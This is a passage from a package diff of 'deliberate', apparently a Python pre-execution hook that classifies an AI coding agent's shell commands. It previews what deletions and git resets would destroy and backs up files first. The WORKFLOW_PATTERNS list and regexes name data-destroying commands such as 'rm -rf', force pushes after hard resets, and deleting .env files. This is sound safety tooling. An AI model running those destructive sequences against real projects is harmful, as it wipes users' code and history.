deliberate 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,1742 @@
1
+ #!/usr/bin/env python3
2
+ # -*- coding: utf-8 -*-
3
+ """
4
+ Deliberate - Command Analysis Hook
5
+
6
+ PreToolUse hook that explains what shell commands will do before execution.
7
+ Multi-layer architecture for robust classification:
8
+
9
+ Layer 1: Pattern matching + ML model (fast, immune to prompt injection)
10
+ Layer 2: LLM explanation (natural language, configurable provider)
11
+
12
+ https://github.com/the-radar/deliberate
13
+ """
14
+
15
+ import json
16
+ import sys
17
+ import os
18
+ import urllib.request
19
+ import urllib.error
20
+ from pathlib import Path
21
+
22
+ # Configuration
23
+ CLASSIFIER_URL = "http://localhost:8765/classify/command"
24
+
25
+ # Support both plugin mode (CLAUDE_PLUGIN_ROOT) and npm install mode (~/.deliberate/)
26
+ # Plugin mode: config in plugin directory
27
+ # npm mode: config in ~/.deliberate/
28
+ PLUGIN_ROOT = os.environ.get('CLAUDE_PLUGIN_ROOT')
29
+ if PLUGIN_ROOT:
30
+ CONFIG_FILE = str(Path(PLUGIN_ROOT) / ".deliberate" / "config.json")
31
+ else:
32
+ CONFIG_FILE = str(Path.home() / ".deliberate" / "config.json")
33
+
34
+ TIMEOUT_SECONDS = 30
35
+ CLASSIFIER_TIMEOUT = 5 # Classifier should be fast
36
+ DEBUG = False
37
+ USE_CLASSIFIER = True # Try classifier first if available
38
+
39
+ # Session state for deduplication
40
+ import hashlib
41
+ import random
42
+ from datetime import datetime
43
+
44
+
45
+ def get_state_file(session_id: str) -> str:
46
+ """Get session-specific state file path."""
47
+ return os.path.expanduser(f"~/.claude/deliberate_cmd_state_{session_id}.json")
48
+
49
+
50
+ def get_history_file(session_id: str) -> str:
51
+ """Get session-specific command history file path."""
52
+ return os.path.expanduser(f"~/.claude/deliberate_cmd_history_{session_id}.json")
53
+
54
+
55
+ def cleanup_old_state_files():
56
+ """Remove state and history files older than 7 days (runs 10% of the time)."""
57
+ if random.random() > 0.1:
58
+ return
59
+ try:
60
+ state_dir = os.path.expanduser("~/.claude")
61
+ if not os.path.exists(state_dir):
62
+ return
63
+ current_time = datetime.now().timestamp()
64
+ seven_days_ago = current_time - (7 * 24 * 60 * 60)
65
+ for filename in os.listdir(state_dir):
66
+ # Clean up state files, history files, and cache files
67
+ if filename.startswith("deliberate_") and filename.endswith(".json"):
68
+ file_path = os.path.join(state_dir, filename)
69
+ try:
70
+ if os.path.getmtime(file_path) < seven_days_ago:
71
+ os.remove(file_path)
72
+ except (OSError, IOError):
73
+ pass
74
+ except Exception:
75
+ pass
76
+
77
+
78
+ def load_state(session_id: str) -> set:
79
+ """Load the set of already-shown warning keys for this session."""
80
+ state_file = get_state_file(session_id)
81
+ if os.path.exists(state_file):
82
+ try:
83
+ with open(state_file, 'r') as f:
84
+ return set(json.load(f))
85
+ except (json.JSONDecodeError, IOError):
86
+ return set()
87
+ return set()
88
+
89
+
90
+ # Workflow patterns that indicate dangerous sequences
91
+ # Format: (pattern_name, required_commands, risk_level, description)
92
+ WORKFLOW_PATTERNS = [
93
+ ("REPO_WIPE", ["git rm", "git push --force"], "CRITICAL",
94
+ "Repository wipe: removing files from git and force pushing rewrites history permanently"),
95
+ ("REPO_WIPE", ["rm -rf", "git add", "git push --force"], "CRITICAL",
96
+ "Repository restructure with force push: deleting files and force pushing can destroy code"),
97
+ ("MASS_DELETE", ["rm -rf", "rm -rf", "rm -rf"], "HIGH",
98
+ "Multiple recursive deletions in sequence - high risk of unintended data loss"),
99
+ ("HISTORY_REWRITE", ["git reset --hard", "git push --force"], "CRITICAL",
100
+ "History rewrite: hard reset + force push permanently destroys commit history"),
101
+ ("HISTORY_REWRITE", ["git rebase", "git push --force"], "CRITICAL",
102
+ "History rewrite: rebase + force push rewrites shared history"),
103
+ ("UNCOMMITTED_RISK", ["git stash", "git checkout", "rm"], "HIGH",
104
+ "Uncommitted changes at risk: stashing, switching branches, and deleting files"),
105
+ ("TEMP_SWAP", ["cp", "rm -rf", "cp"], "HIGH",
106
+ "Temp directory swap pattern: copying to temp, deleting original, copying back - easy to lose data"),
107
+ ("ENV_DESTRUCTION", ["unset", "rm .env"], "HIGH",
108
+ "Environment destruction: unsetting variables and deleting env files"),
109
+ ]
110
+
111
+
112
+ def load_command_history(session_id: str) -> dict:
113
+ """Load command history for this session.
114
+
115
+ Returns dict with:
116
+ - commands: list of {command, risk, timestamp, explanation}
117
+ - cumulative_risk: current session risk level
118
+ - patterns_detected: list of detected workflow patterns
119
+ - files_at_risk: set of files that could be affected
120
+ """
121
+ history_file = get_history_file(session_id)
122
+ default_history = {
123
+ "commands": [],
124
+ "cumulative_risk": "LOW",
125
+ "patterns_detected": [],
126
+ "files_at_risk": []
127
+ }
128
+
129
+ if os.path.exists(history_file):
130
+ try:
131
+ with open(history_file, 'r') as f:
132
+ history = json.load(f)
133
+ # Ensure all keys exist
134
+ for key in default_history:
135
+ if key not in history:
136
+ history[key] = default_history[key]
137
+ return history
138
+ except (json.JSONDecodeError, IOError):
139
+ return default_history
140
+ return default_history
141
+
142
+
143
+ def save_command_history(session_id: str, history: dict):
144
+ """Save command history for this session."""
145
+ history_file = get_history_file(session_id)
146
+ try:
147
+ os.makedirs(os.path.dirname(history_file), exist_ok=True)
148
+ with open(history_file, 'w') as f:
149
+ json.dump(history, f, indent=2)
150
+ except IOError:
151
+ pass
152
+
153
+
154
+ def extract_affected_paths(command: str) -> list:
155
+ """Extract file/directory paths that could be affected by a command.
156
+
157
+ Looks for paths in common destructive commands like rm, mv, cp, git rm, etc.
158
+ """
159
+ import re
160
+ paths = []
161
+
162
+ # Patterns for extracting paths from various commands
163
+ # rm -rf /path or rm -rf path
164
+ rm_match = re.findall(r'rm\s+(?:-[rfivd]+\s+)*([^\s|;&>]+)', command)
165
+ paths.extend(rm_match)
166
+
167
+ # git rm -rf path
168
+ git_rm_match = re.findall(r'git\s+rm\s+(?:-[rf]+\s+)*([^\s|;&>]+)', command)
169
+ paths.extend(git_rm_match)
170
+
171
+ # mv source dest - source is at risk
172
+ mv_match = re.findall(r'mv\s+(?:-[fiv]+\s+)*([^\s|;&>]+)\s+', command)
173
+ paths.extend(mv_match)
174
+
175
+ # Filter out flags and special chars
176
+ paths = [p for p in paths if not p.startswith('-') and p not in ['.', '..', '/']]
177
+
178
+ return paths
179
+
180
+
181
+ def detect_workflow_patterns(history: dict, current_command: str, window_size: int = 3) -> list:
182
+ """Detect dangerous workflow patterns from recent command history + current command.
183
+
184
+ Uses a sliding window to only look at the last N commands, avoiding stale pattern
185
+ matches from old commands that are no longer relevant to the current context.
186
+
187
+ Args:
188
+ history: Command history dict with "commands" list
189
+ current_command: The command being analyzed
190
+ window_size: Number of recent commands to consider (default 3)
191
+
192
+ Returns list of (pattern_name, risk_level, description) for detected patterns.
193
+ """
194
+ detected = []
195
+
196
+ # Only look at the last N commands (sliding window)
197
+ all_history_commands = [cmd["command"] for cmd in history.get("commands", [])]
198
+ recent_commands = all_history_commands[-window_size:] if all_history_commands else []
199
+ recent_commands.append(current_command)
200
+
201
+ # Check each workflow pattern against recent commands only
202
+ for pattern_name, required_cmds, risk_level, description in WORKFLOW_PATTERNS:
203
+ # Check if all required command patterns appear in sequence within the window
204
+ found_all = True
205
+ last_idx = -1
206
+
207
+ for required in required_cmds:
208
+ found_this = False
209
+ for idx, cmd in enumerate(recent_commands):
210
+ if idx > last_idx and required.lower() in cmd.lower():
211
+ found_this = True
212
+ last_idx = idx
213
+ break
214
+
215
+ if not found_this:
216
+ found_all = False
217
+ break
218
+
219
+ if found_all:
220
+ detected.append((pattern_name, risk_level, description))
221
+
222
+ return detected
223
+
224
+
225
+ def calculate_cumulative_risk(history: dict, current_risk: str) -> str:
226
+ """Calculate cumulative session risk based on history and current command.
227
+
228
+ Risk escalates based on:
229
+ - Number of DANGEROUS commands
230
+ - Detected workflow patterns
231
+ - Files at risk
232
+ """
233
+ risk_levels = {"LOW": 0, "MODERATE": 1, "HIGH": 2, "CRITICAL": 3}
234
+
235
+ # Start with current command's risk
236
+ max_risk = risk_levels.get(current_risk, 1)
237
+
238
+ # Check historical risks
239
+ dangerous_count = 0
240
+ for cmd in history.get("commands", []):
241
+ cmd_risk = cmd.get("risk", "MODERATE")
242
+ if cmd_risk == "DANGEROUS":
243
+ dangerous_count += 1
244
+ max_risk = max(max_risk, risk_levels.get(cmd_risk, 1))
245
+
246
+ # Escalate based on dangerous command count
247
+ if dangerous_count >= 3:
248
+ max_risk = max(max_risk, risk_levels["HIGH"])
249
+ if dangerous_count >= 5:
250
+ max_risk = max(max_risk, risk_levels["CRITICAL"])
251
+
252
+ # Check for detected patterns
253
+ for pattern in history.get("patterns_detected", []):
254
+ pattern_risk = pattern[1] if len(pattern) > 1 else "HIGH"
255
+ max_risk = max(max_risk, risk_levels.get(pattern_risk, 2))
256
+
257
+ # Convert back to string
258
+ for name, level in risk_levels.items():
259
+ if level == max_risk:
260
+ return name
261
+
262
+ return "MODERATE"
263
+
264
+
265
+ def get_destruction_consequences(command: str, cwd: str = ".") -> dict | None:
266
+ """Analyze what a destructive command will actually delete/modify.
267
+
268
+ Returns dict with:
269
+ - files: list of files that will be affected
270
+ - dirs: list of directories that will be affected
271
+ - total_lines: estimated lines of code at risk
272
+ - total_size: total size in bytes
273
+ - warning: human-readable consequence summary
274
+ - type: the type of destruction (rm, git_reset, git_clean, etc.)
275
+
276
+ Returns None if command is not destructive or paths don't exist.
277
+ """
278
+ import re
279
+ import subprocess
280
+
281
+ consequences = {
282
+ "files": [],
283
+ "dirs": [],
284
+ "total_lines": 0,
285
+ "total_size": 0,
286
+ "warning": "",
287
+ "type": None
288
+ }
289
+
290
+ # Check for git reset --hard (discards uncommitted changes)
291
+ if re.search(r'git\s+reset\s+--hard', command):
292
+ return _analyze_git_reset_hard(cwd, consequences)
293
+
294
+ # Check for git clean (removes untracked files)
295
+ if re.search(r'git\s+clean', command):
296
+ return _analyze_git_clean(cwd, consequences)
297
+
298
+ # Check for git checkout -- (discards uncommitted changes to tracked files)
299
+ if re.search(r'git\s+checkout\s+--', command) or re.search(r'git\s+checkout\s+\.\s*$', command):
300
+ return _analyze_git_checkout_discard(cwd, consequences)
301
+
302
+ # Check for git stash drop (permanently deletes stashed changes)
303
+ if re.search(r'git\s+stash\s+drop', command):
304
+ return _analyze_git_stash_drop(cwd, command, consequences)
305
+
306
+ # Detect rm commands and extract targets
307
+ rm_pattern = r'rm\s+(?:-[rfivd]+\s+)*(.+?)(?:\s*[|;&>]|$)'
308
+ rm_match = re.search(rm_pattern, command)
309
+
310
+ # Detect git rm commands
311
+ git_rm_pattern = r'git\s+rm\s+(?:-[rf]+\s+)*(.+?)(?:\s*[|;&>]|$)'
312
+ git_rm_match = re.search(git_rm_pattern, command)
313
+
314
+ targets = []
315
+ if rm_match:
316
+ # Split by spaces but respect quotes
317
+ target_str = rm_match.group(1).strip()
318
+ targets = target_str.split()
319
+ consequences["type"] = "rm"
320
+ elif git_rm_match:
321
+ target_str = git_rm_match.group(1).strip()
322
+ targets = target_str.split()
323
+ consequences["type"] = "git_rm"
324
+
325
+ if not targets:
326
+ return None
327
+
328
+ # Analyze each target
329
+ for target in targets:
330
+ if target.startswith('-'):
331
+ continue # Skip flags
332
+
333
+ # Expand path relative to cwd
334
+ if not os.path.isabs(target):
335
+ target = os.path.join(cwd, target)
336
+ target = os.path.expanduser(target)
337
+
338
+ # Handle glob patterns
339
+ if '*' in target or '?' in target:
340
+ import glob
341
+ expanded = glob.glob(target, recursive=True)
342
+ for path in expanded:
343
+ _analyze_path(path, consequences)
344
+ elif os.path.exists(target):
345
+ _analyze_path(target, consequences)
346
+
347
+ # Generate warning message
348
+ if consequences["files"] or consequences["dirs"]:
349
+ file_count = len(consequences["files"])
350
+ dir_count = len(consequences["dirs"])
351
+ lines = consequences["total_lines"]
352
+ size_kb = consequences["total_size"] / 1024
353
+
354
+ parts = []
355
+ if file_count:
356
+ parts.append(f"{file_count} file{'s' if file_count > 1 else ''}")
357
+ if dir_count:
358
+ parts.append(f"{dir_count} director{'ies' if dir_count > 1 else 'y'}")
359
+
360
+ consequences["warning"] = f"āš ļø WILL DELETE: {', '.join(parts)}"
361
+ if lines > 0:
362
+ consequences["warning"] += f" ({lines:,} lines of code)"
363
+ if size_kb > 1:
364
+ consequences["warning"] += f" [{size_kb:.1f} KB]"
365
+
366
+ # Show preview of what will be deleted
367
+ preview_files = consequences["files"][:10]
368
+ if preview_files:
369
+ consequences["warning"] += "\n Files:"
370
+ for f in preview_files:
371
+ consequences["warning"] += f"\n - {f}"
372
+ if len(consequences["files"]) > 10:
373
+ consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
374
+
375
+ return consequences
376
+
377
+ return None
378
+
379
+
380
+ def _analyze_path(path: str, consequences: dict):
381
+ """Helper to analyze a single path and add to consequences."""
382
+ try:
383
+ if os.path.isfile(path):
384
+ consequences["files"].append(path)
385
+ size = os.path.getsize(path)
386
+ consequences["total_size"] += size
387
+
388
+ # Count lines for text files
389
+ if _is_text_file(path):
390
+ try:
391
+ with open(path, 'r', encoding='utf-8', errors='ignore') as f:
392
+ lines = sum(1 for _ in f)
393
+ consequences["total_lines"] += lines
394
+ except (IOError, PermissionError):
395
+ pass
396
+
397
+ elif os.path.isdir(path):
398
+ consequences["dirs"].append(path)
399
+ # Walk directory to count contents
400
+ for root, _dirs, files in os.walk(path):
401
+ for filename in files:
402
+ filepath = os.path.join(root, filename)
403
+ try:
404
+ consequences["files"].append(filepath)
405
+ size = os.path.getsize(filepath)
406
+ consequences["total_size"] += size
407
+
408
+ if _is_text_file(filepath):
409
+ with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
410
+ lines = sum(1 for _ in f)
411
+ consequences["total_lines"] += lines
412
+ except (IOError, PermissionError, OSError):
413
+ pass
414
+ except (OSError, PermissionError):
415
+ pass
416
+
417
+
418
+ def _analyze_git_reset_hard(cwd: str, consequences: dict) -> dict | None:
419
+ """Analyze what git reset --hard will discard.
420
+
421
+ Runs git diff HEAD to see uncommitted changes that will be lost.
422
+ """
423
+ import subprocess
424
+
425
+ consequences["type"] = "git_reset_hard"
426
+
427
+ try:
428
+ # Get list of modified files
429
+ status_result = subprocess.run(
430
+ ["git", "status", "--porcelain"],
431
+ capture_output=True, text=True, timeout=10, cwd=cwd
432
+ )
433
+
434
+ if status_result.returncode != 0:
435
+ return None # Not a git repo
436
+
437
+ if not status_result.stdout.strip():
438
+ return None # No uncommitted changes, reset is safe
439
+
440
+ # Parse modified files
441
+ for line in status_result.stdout.strip().split('\n'):
442
+ if len(line) >= 3:
443
+ status = line[:2]
444
+ filepath = line[3:].strip()
445
+
446
+ # Handle renamed files (R old -> new)
447
+ if ' -> ' in filepath:
448
+ filepath = filepath.split(' -> ')[1]
449
+
450
+ full_path = os.path.join(cwd, filepath)
451
+
452
+ # M = modified, A = added, D = deleted, ? = untracked
453
+ if status[0] in 'MA' or status[1] in 'MA':
454
+ consequences["files"].append(filepath)
455
+ if os.path.exists(full_path):
456
+ try:
457
+ size = os.path.getsize(full_path)
458
+ consequences["total_size"] += size
459
+ if _is_text_file(full_path):
460
+ with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
461
+ lines = sum(1 for _ in f)
462
+ consequences["total_lines"] += lines
463
+ except (IOError, OSError):
464
+ pass
465
+
466
+ # Get actual diff to show what changes will be lost
467
+ diff_result = subprocess.run(
468
+ ["git", "diff", "HEAD", "--stat"],
469
+ capture_output=True, text=True, timeout=10, cwd=cwd
470
+ )
471
+
472
+ if not consequences["files"]:
473
+ return None
474
+
475
+ # Build warning message
476
+ file_count = len(consequences["files"])
477
+ lines = consequences["total_lines"]
478
+
479
+ consequences["warning"] = f"āš ļø UNCOMMITTED CHANGES WILL BE DISCARDED: {file_count} file{'s' if file_count > 1 else ''}"
480
+ if lines > 0:
481
+ consequences["warning"] += f" ({lines:,} lines of changes)"
482
+
483
+ consequences["warning"] += "\n Modified files:"
484
+ for f in consequences["files"][:10]:
485
+ consequences["warning"] += f"\n - {f}"
486
+ if len(consequences["files"]) > 10:
487
+ consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
488
+
489
+ if diff_result.stdout:
490
+ # Add the stat summary
491
+ stat_lines = diff_result.stdout.strip().split('\n')
492
+ if stat_lines:
493
+ consequences["warning"] += f"\n\n {stat_lines[-1]}" # Summary line like "5 files changed, 120 insertions(+), 30 deletions(-)"
494
+
495
+ return consequences
496
+
497
+ except (subprocess.TimeoutExpired, FileNotFoundError, OSError):
498
+ return None
499
+
500
+
501
+ def _analyze_git_clean(cwd: str, consequences: dict) -> dict | None:
502
+ """Analyze what git clean will remove.
503
+
504
+ Runs git clean -n (dry run) to preview what would be deleted.
505
+ """
506
+ import subprocess
507
+
508
+ consequences["type"] = "git_clean"
509
+
510
+ try:
511
+ # Dry run to see what would be removed
512
+ # -d includes directories, -f is required, -n is dry run
513
+ clean_result = subprocess.run(
514
+ ["git", "clean", "-dfn"],
515
+ capture_output=True, text=True, timeout=10, cwd=cwd
516
+ )
517
+
518
+ if clean_result.returncode != 0:
519
+ return None
520
+
521
+ if not clean_result.stdout.strip():
522
+ return None # Nothing to clean
523
+
524
+ # Parse output: "Would remove path/to/file"
525
+ for line in clean_result.stdout.strip().split('\n'):
526
+ if line.startswith("Would remove "):
527
+ filepath = line[len("Would remove "):].strip()
528
+ full_path = os.path.join(cwd, filepath)
529
+
530
+ if os.path.isdir(full_path):
531
+ consequences["dirs"].append(filepath)
532
+ # Count files in directory
533
+ for root, _dirs, files in os.walk(full_path):
534
+ for filename in files:
535
+ fpath = os.path.join(root, filename)
536
+ consequences["files"].append(fpath)
537
+ try:
538
+ consequences["total_size"] += os.path.getsize(fpath)
539
+ if _is_text_file(fpath):
540
+ with open(fpath, 'r', encoding='utf-8', errors='ignore') as f:
541
+ consequences["total_lines"] += sum(1 for _ in f)
542
+ except (IOError, OSError):
543
+ pass
544
+ else:
545
+ consequences["files"].append(filepath)
546
+ if os.path.exists(full_path):
547
+ try:
548
+ consequences["total_size"] += os.path.getsize(full_path)
549
+ if _is_text_file(full_path):
550
+ with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
551
+ consequences["total_lines"] += sum(1 for _ in f)
552
+ except (IOError, OSError):
553
+ pass
554
+
555
+ if not consequences["files"] and not consequences["dirs"]:
556
+ return None
557
+
558
+ # Build warning
559
+ file_count = len(consequences["files"])
560
+ dir_count = len(consequences["dirs"])
561
+ lines = consequences["total_lines"]
562
+
563
+ consequences["warning"] = f"āš ļø UNTRACKED FILES WILL BE DELETED: {file_count} file{'s' if file_count != 1 else ''}"
564
+ if dir_count:
565
+ consequences["warning"] += f", {dir_count} director{'ies' if dir_count != 1 else 'y'}"
566
+ if lines > 0:
567
+ consequences["warning"] += f" ({lines:,} lines)"
568
+
569
+ consequences["warning"] += "\n Will remove:"
570
+ for f in consequences["files"][:10]:
571
+ consequences["warning"] += f"\n - {f}"
572
+ if len(consequences["files"]) > 10:
573
+ consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
574
+
575
+ return consequences
576
+
577
+ except (subprocess.TimeoutExpired, FileNotFoundError, OSError):
578
+ return None
579
+
580
+
581
+ def _analyze_git_checkout_discard(cwd: str, consequences: dict) -> dict | None:
582
+ """Analyze what git checkout -- will discard.
583
+
584
+ Shows modified tracked files that will lose their changes.
585
+ """
586
+ import subprocess
587
+
588
+ consequences["type"] = "git_checkout_discard"
589
+
590
+ try:
591
+ # Get modified files (not staged)
592
+ diff_result = subprocess.run(
593
+ ["git", "diff", "--name-only"],
594
+ capture_output=True, text=True, timeout=10, cwd=cwd
595
+ )
596
+
597
+ if diff_result.returncode != 0:
598
+ return None
599
+
600
+ if not diff_result.stdout.strip():
601
+ return None # No modifications to discard
602
+
603
+ for filepath in diff_result.stdout.strip().split('\n'):
604
+ filepath = filepath.strip()
605
+ if not filepath:
606
+ continue
607
+
608
+ consequences["files"].append(filepath)
609
+ full_path = os.path.join(cwd, filepath)
610
+
611
+ if os.path.exists(full_path):
612
+ try:
613
+ consequences["total_size"] += os.path.getsize(full_path)
614
+ if _is_text_file(full_path):
615
+ with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
616
+ consequences["total_lines"] += sum(1 for _ in f)
617
+ except (IOError, OSError):
618
+ pass
619
+
620
+ if not consequences["files"]:
621
+ return None
622
+
623
+ # Get diff stat for summary
624
+ stat_result = subprocess.run(
625
+ ["git", "diff", "--stat"],
626
+ capture_output=True, text=True, timeout=10, cwd=cwd
627
+ )
628
+
629
+ file_count = len(consequences["files"])
630
+ consequences["warning"] = f"āš ļø UNCOMMITTED CHANGES WILL BE DISCARDED: {file_count} file{'s' if file_count != 1 else ''}"
631
+
632
+ consequences["warning"] += "\n Modified files:"
633
+ for f in consequences["files"][:10]:
634
+ consequences["warning"] += f"\n - {f}"
635
+ if len(consequences["files"]) > 10:
636
+ consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
637
+
638
+ if stat_result.stdout:
639
+ stat_lines = stat_result.stdout.strip().split('\n')
640
+ if stat_lines:
641
+ consequences["warning"] += f"\n\n {stat_lines[-1]}"
642
+
643
+ return consequences
644
+
645
+ except (subprocess.TimeoutExpired, FileNotFoundError, OSError):
646
+ return None
647
+
648
+
649
+ def _analyze_git_stash_drop(cwd: str, command: str, consequences: dict) -> dict | None:
650
+ """Analyze what git stash drop will permanently delete.
651
+
652
+ Shows the content of the stash being dropped.
653
+ """
654
+ import subprocess
655
+ import re
656
+
657
+ consequences["type"] = "git_stash_drop"
658
+
659
+ try:
660
+ # Parse which stash is being dropped (default is stash@{0})
661
+ stash_ref = "stash@{0}"
662
+ match = re.search(r'stash@\{(\d+)\}', command)
663
+ if match:
664
+ stash_ref = f"stash@{{{match.group(1)}}}"
665
+
666
+ # Get stash info
667
+ show_result = subprocess.run(
668
+ ["git", "stash", "show", "--stat", stash_ref],
669
+ capture_output=True, text=True, timeout=10, cwd=cwd
670
+ )
671
+
672
+ if show_result.returncode != 0:
673
+ return None # Stash doesn't exist
674
+
675
+ # Parse files from stash show output
676
+ for line in show_result.stdout.strip().split('\n'):
677
+ # Lines look like: " file.txt | 10 +++---"
678
+ if '|' in line:
679
+ filepath = line.split('|')[0].strip()
680
+ if filepath:
681
+ consequences["files"].append(filepath)
682
+
683
+ if not consequences["files"]:
684
+ return None
685
+
686
+ file_count = len(consequences["files"])
687
+ consequences["warning"] = f"āš ļø STASH WILL BE PERMANENTLY DELETED: {stash_ref} ({file_count} file{'s' if file_count != 1 else ''})"
688
+
689
+ consequences["warning"] += "\n Stashed changes:"
690
+ for f in consequences["files"][:10]:
691
+ consequences["warning"] += f"\n - {f}"
692
+ if len(consequences["files"]) > 10:
693
+ consequences["warning"] += f"\n ... and {len(consequences['files']) - 10} more"
694
+
695
+ # Add the stat summary
696
+ stat_lines = show_result.stdout.strip().split('\n')
697
+ if stat_lines:
698
+ consequences["warning"] += f"\n\n {stat_lines[-1]}"
699
+
700
+ return consequences
701
+
702
+ except (subprocess.TimeoutExpired, FileNotFoundError, OSError):
703
+ return None
704
+
705
+
706
+ def _is_text_file(path: str) -> bool:
707
+ """Check if file is likely a text/code file based on extension."""
708
+ text_extensions = {
709
+ '.py', '.js', '.ts', '.tsx', '.jsx', '.json', '.yaml', '.yml',
710
+ '.md', '.txt', '.sh', '.bash', '.zsh', '.fish',
711
+ '.html', '.css', '.scss', '.sass', '.less',
712
+ '.java', '.kt', '.scala', '.go', '.rs', '.rb', '.php',
713
+ '.c', '.cpp', '.h', '.hpp', '.cs', '.swift', '.m',
714
+ '.sql', '.graphql', '.proto', '.xml', '.toml', '.ini', '.cfg',
715
+ '.env', '.gitignore', '.dockerignore', 'Makefile', 'Dockerfile',
716
+ '.vue', '.svelte', '.astro'
717
+ }
718
+ _, ext = os.path.splitext(path)
719
+ return ext.lower() in text_extensions or os.path.basename(path) in text_extensions
720
+
721
+
722
+ def get_backup_dir() -> str:
723
+ """Get the Deliberate backup directory."""
724
+ return os.path.expanduser("~/.deliberate/backups")
725
+
726
+
727
+ def create_pre_destruction_backup(
728
+ session_id: str,
729
+ command: str,
730
+ cwd: str,
731
+ consequences: dict | None,
732
+ history: dict | None
733
+ ) -> str | None:
734
+ """Create automatic backup before CRITICAL operations.
735
+
736
+ Backs up:
737
+ - Files that will be affected (if consequences provided)
738
+ - Current git state (branch, uncommitted changes)
739
+ - Session command history (for context)
740
+
741
+ Returns backup path if successful, None if backup failed/skipped.
742
+ """
743
+ import shutil
744
+ import subprocess
745
+
746
+ backup_base = get_backup_dir()
747
+ timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
748
+
749
+ # Create project-specific backup dir
750
+ project_name = os.path.basename(cwd) or "unknown"
751
+ backup_dir = os.path.join(backup_base, project_name, timestamp)
752
+
753
+ try:
754
+ os.makedirs(backup_dir, exist_ok=True)
755
+
756
+ # 1. Track file mappings for restore
757
+ file_mappings = [] # {"original": absolute path, "backup": relative path in backup}
758
+
759
+ # 2. Backup files at risk (if we have them)
760
+ if consequences and consequences.get("files"):
761
+ files_dir = os.path.join(backup_dir, "files")
762
+ os.makedirs(files_dir, exist_ok=True)
763
+
764
+ backed_up = 0
765
+ for filepath in consequences["files"][:100]: # Limit to 100 files
766
+ # Resolve to absolute path
767
+ if os.path.isabs(filepath):
768
+ abs_path = filepath
769
+ else:
770
+ abs_path = os.path.join(cwd, filepath)
771
+
772
+ if os.path.exists(abs_path) and os.path.isfile(abs_path):
773
+ try:
774
+ # Preserve directory structure relative to cwd
775
+ rel_path = os.path.relpath(abs_path, cwd)
776
+ dest_path = os.path.join(files_dir, rel_path)
777
+ os.makedirs(os.path.dirname(dest_path), exist_ok=True)
778
+ shutil.copy2(abs_path, dest_path)
779
+
780
+ # Track mapping for restore
781
+ file_mappings.append({
782
+ "original": abs_path,
783
+ "backup": os.path.join("files", rel_path)
784
+ })
785
+ backed_up += 1
786
+ except (IOError, OSError, shutil.Error):
787
+ pass
788
+
789
+ debug(f"Backed up {backed_up} files to {files_dir}")
790
+
791
+ # 3. Save metadata with file mappings for restore
792
+ metadata = {
793
+ "timestamp": datetime.now().isoformat(),
794
+ "session_id": session_id,
795
+ "command": command,
796
+ "cwd": cwd,
797
+ "consequences": consequences,
798
+ "history": history,
799
+ "file_mappings": file_mappings, # For restore: original path -> backup path
800
+ "version": "2.0" # Metadata format version
801
+ }
802
+ with open(os.path.join(backup_dir, "metadata.json"), 'w') as f:
803
+ json.dump(metadata, f, indent=2)
804
+
805
+ # 3. Capture git state if in a repo
806
+ git_dir = os.path.join(backup_dir, "git_state")
807
+ os.makedirs(git_dir, exist_ok=True)
808
+
809
+ try:
810
+ # Get current branch
811
+ branch_result = subprocess.run(
812
+ ["git", "rev-parse", "--abbrev-ref", "HEAD"],
813
+ capture_output=True, text=True, timeout=5, cwd=cwd
814
+ )
815
+ if branch_result.returncode == 0:
816
+ with open(os.path.join(git_dir, "branch.txt"), 'w') as f:
817
+ f.write(branch_result.stdout.strip())
818
+
819
+ # Get current commit
820
+ commit_result = subprocess.run(
821
+ ["git", "rev-parse", "HEAD"],
822
+ capture_output=True, text=True, timeout=5, cwd=cwd
823
+ )
824
+ if commit_result.returncode == 0:
825
+ with open(os.path.join(git_dir, "commit.txt"), 'w') as f:
826
+ f.write(commit_result.stdout.strip())
827
+
828
+ # Get status
829
+ status_result = subprocess.run(
830
+ ["git", "status", "--porcelain"],
831
+ capture_output=True, text=True, timeout=10, cwd=cwd
832
+ )
833
+ if status_result.returncode == 0:
834
+ with open(os.path.join(git_dir, "status.txt"), 'w') as f:
835
+ f.write(status_result.stdout)
836
+
837
+ # Get diff of uncommitted changes
838
+ diff_result = subprocess.run(
839
+ ["git", "diff", "HEAD"],
840
+ capture_output=True, text=True, timeout=30, cwd=cwd
841
+ )
842
+ if diff_result.returncode == 0 and diff_result.stdout:
843
+ with open(os.path.join(git_dir, "uncommitted.diff"), 'w') as f:
844
+ f.write(diff_result.stdout)
845
+
846
+ except (subprocess.TimeoutExpired, FileNotFoundError):
847
+ debug("Git state capture skipped (not a git repo or git unavailable)")
848
+
849
+ debug(f"Created backup at {backup_dir}")
850
+ return backup_dir
851
+
852
+ except Exception as e:
853
+ debug(f"Backup failed: {e}")
854
+ return None
855
+
856
+
857
+ def load_backup_config() -> dict:
858
+ """Load backup configuration from config file."""
859
+ try:
860
+ config_path = Path(CONFIG_FILE)
861
+ if config_path.exists():
862
+ with open(config_path, 'r', encoding='utf-8') as f:
863
+ config = json.load(f)
864
+ backup = config.get("backup", {})
865
+ return {
866
+ "enabled": backup.get("enabled", True), # Enabled by default
867
+ "maxBackups": backup.get("maxBackups", 50),
868
+ "riskThreshold": backup.get("riskThreshold", "CRITICAL") # Only backup for CRITICAL by default
869
+ }
870
+ except Exception:
871
+ pass
872
+ return {"enabled": True, "maxBackups": 50, "riskThreshold": "CRITICAL"}
873
+
874
+
875
+ def add_command_to_history(session_id: str, command: str, risk: str, explanation: str):
876
+ """Add a command to session history and update cumulative analysis."""
877
+ history = load_command_history(session_id)
878
+
879
+ # Add command entry
880
+ history["commands"].append({
881
+ "command": command[:500], # Truncate long commands
882
+ "risk": risk,
883
+ "explanation": explanation[:200] if explanation else "",
884
+ "timestamp": datetime.now().isoformat()
885
+ })
886
+
887
+ # Keep only last 50 commands to prevent unbounded growth
888
+ if len(history["commands"]) > 50:
889
+ history["commands"] = history["commands"][-50:]
890
+
891
+ # Detect workflow patterns
892
+ patterns = detect_workflow_patterns(history, command)
893
+ if patterns:
894
+ for pattern in patterns:
895
